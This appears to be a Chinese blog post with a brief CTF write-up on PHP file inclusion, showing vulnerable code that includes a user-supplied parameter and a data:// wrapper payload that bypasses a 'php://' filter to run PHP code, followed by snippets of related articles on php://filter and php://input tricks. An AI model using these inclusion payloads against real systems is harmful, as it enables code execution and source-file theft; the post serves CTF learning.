ctf伪协议题

最新推荐文章于 2024-05-02 05:36:20 发布
最新推荐文章于 2024-05-02 05:36:20 发布
阅读量248 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/120590451
版权

PHP 安全 注入漏洞 data://协议 php://协议
关键词由CSDN通过智能技术生成 
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>里插入代码片

关于为协议:
https://segmentfault.com/a/1190000018991087

这里直接使用data:// 协议

http://127.0.0.1/index.php?php://data://text/plain,<?php%20phpinfo();?>
这里直接将php://替换为空了

qq_42307546
关注
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
【网络安全 | CTF】攻防世界 fileclude 解详析(php伪协议
等风来
07-31 4967
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1748
文章目录前言一、目描述二、解步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 目分类: CTF—Web—文件包含—02—rot13伪协议 一、目描述 目:13、另辟蹊径 (号为13) 二、解步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
浅析PHP伪协议CTF的应用
weixin_33725239的博客
11-22 482
PHP支持的伪协议如下: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — 查找匹配的文件路径模式 phar:// — PHP 归档 ...
一个关于本地包含和PHP伪协议CTF(Bugku——flag在index里)
weixin_44377940的博客
04-14 1378
在点开目链接,查看源代码之后,我们看到这个界面: 这看起来没什么,我们点击链接之后,发现它的URL发生了变化: 看到file,即想到了本地文件包含漏洞。 根据目flag在index里,但index文件并没有flag,因为PHP代码是后端解析实现,不会在前端显示代码,所以返回的是运行结果。于是想到我们可以使用PHP伪协议来读取隐藏的内容,关于PHP伪协议的内容,可以参照PHP手册相关内容(可...
ctf上传一个php木马,文件上传的ctf_web目【伪协议
weixin_34816913的博客
03-17 1147
1.第一Qiyu_20170807_210121.png文件包含可以读到php源代码源代码:require("header.php");$page="";if (isset($_GET['page']))$page=$_GET['page'].".php"; #page参数自动添加了.php后缀,因此文件包含的index不需要加后缀else$page="main.php";include(...
CTFctf中用到的php伪协议总结及例(持续更)
weixin_52450702的博客
02-03 3542
ctf中用到的php伪协议总结及例
【网络安全 | CTF】攻防世界 fileinclude 解详析(php伪协议
等风来
07-31 4455
由于index.php在/var/www/html目录下,而flag.php与index.php同为php文件,故猜想flag.php也在该目录下。因此解思路为:利用php伪协议,构造language参数,来读取该目录下的flag.php文件。,即此处存在文件包含。
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法_php伪协议是漏洞吗(2)
最新发布
2401_84297193的博客
05-02 36
通过在url后面添加了伪协议读取方式,我们就将它的源码以base64的编码格式读取出来了,通过这个例子,我们通过php://filter伪协议将服务器中的flag.php文件源码读取出来了,说明这个伪协议可能造成源码或者服务器敏感信息泄露。PHP这门语言,凭借其上手快,轻量级,以往在建站的时候被广泛使用,现实使用较少了,虽然使用少了但我们还是要对其存在的漏洞有所了解,掌握其中原理,以及了解其漏洞的基本利用方法。目给了提示,文件包含,所以这个p盲猜是include内的参数,所以直接输入flag试试。
ctf任意文件包含漏洞简单讲解含php伪协议及习
qq_59950255的博客
11-26 2045
先来看看什么是文件包含 在开发的过程中,遇到一些需要经常重复使用的代码,如果每次都重新写入,会造成很大的麻烦,所以,我们会将这些需要大量使用的重复代码写入一个文件中,在项目中通过函数引入这个文件,那么就可以做到代码的插入。 这些代码由几个函数引入 1.include()函数 include()函数,是临时加载的,在读到该函数时,才会包含里面的文件。include()在执行的时候如果: "合法代码" include('XXXX')假如include读取的文件不存在,他的上下两个"合法代码"都会执..
ctf文件包含+伪协议总结
limenzzz的博客
09-08 2430
基本原理
Java安全编码标准
diaojin6880的博客
09-17 654
Java安全编码标准 具体参考Rules 输入验证和数据净化(IDS)规则风险评估概要 IDS00-J净化穿越受信边界的非受信数据 IDS01-J验证前标准化字符串 IDS02-J在验证之前标准化路径名 IDS03-J不要记录未经净化的用户输入 IDS04-J限制传递给ZipInputStream的文件大小 IDS0...
CTF_Web:文件包含与php伪协议
AFCC_的博客(Web_Dog)
08-11 3112
前言 在CTF目中文件包含和伪协议使用也是常见的一类目,常见的主要使用include()、require()等函数与其搭配产生可利用的漏洞或命令执行。 0x01 什么是文件包含 在开发的过程中,开发人员为了更好地使用代码的重用性,不重复的去编写一部分函数,从而引入了文件包含函数,通过文件包含函数将文件包含进来,使用包含文件的代码,降低开发的代码工作量,在同一个文件里面可以包含另外一个或多个文件进而使用他们内部定义的函数。 0x02 文件包含漏洞 在文件包含的过程中,如果没有对可包含的文件类型、用户可控的
CTF积累】两个绕过的
qq_41369524的博客
12-10 1233
第一层绕过:===全等于让substr和md5函数同时报错,返回的就都是nul,从而实现全等于是传参传入数组形势:path[]=1接着第二层绕过:正则匹配^control$:以control开头且结束绕过方法:换行符%0a在结尾不会被识别从而第三层:看到 $getflag= file_get_contents( $b);
ctfshow-php特性
YkingH的博客
01-26 5995
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
java 编码 安全_Java安全编码标准 - osc_ncydfsaa的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_29218963的博客
02-25 252
Java安全编码标准输入验证和数据净化(IDS)规则风险评估概要IDS00-J净化穿越受信边界的非受信数据IDS01-J验证前标准化字符串IDS02-J在验证之前标准化路径名IDS03-J不要记录未经净化的用户输入IDS04-J限制传递给ZipInputStream的文件大小IDS05-J使用ASCII字符集的子集作为文件名和路径名IDS06-J从格式字符串中排除用户输入IDS07-J不要向Run...
CTF中遇见的PHP伪协议运用
热门推荐
byxs007的博客
12-15 1万+
关于PHP伪协议中的总结网上已经有很多文章了 LoRexxar的PHP伪协议总结 PHP伪协议 官方文档 以下都是在做CTF目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结 php://input php://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。 注:enctype=”multipart/form-d
CTF 文件包含与伪协议
weixin_30810583的博客
11-06 884
正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF目很好,用的姿势正如标,文件包含和伪协议。 先放出原文链接(http://www.freebuf.com/column/150028.html) 目源自国外某挑战平台,平台上还有许多其他有趣的challenges目。 站点地址:http://chall.tasteless.eu/ 这次的目链接:http://leve...
ctf php伪协议
10-15
CTF中的PHP伪协议是一种特殊的协议,可以在PHP代码中使用,用于执行一些特殊的操作,例如读取文件、执行系统命令等。它的语法类似于URL,以"php://"开头,后面跟着一些参数和值。但是需要注意的是,使用PHP伪协议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值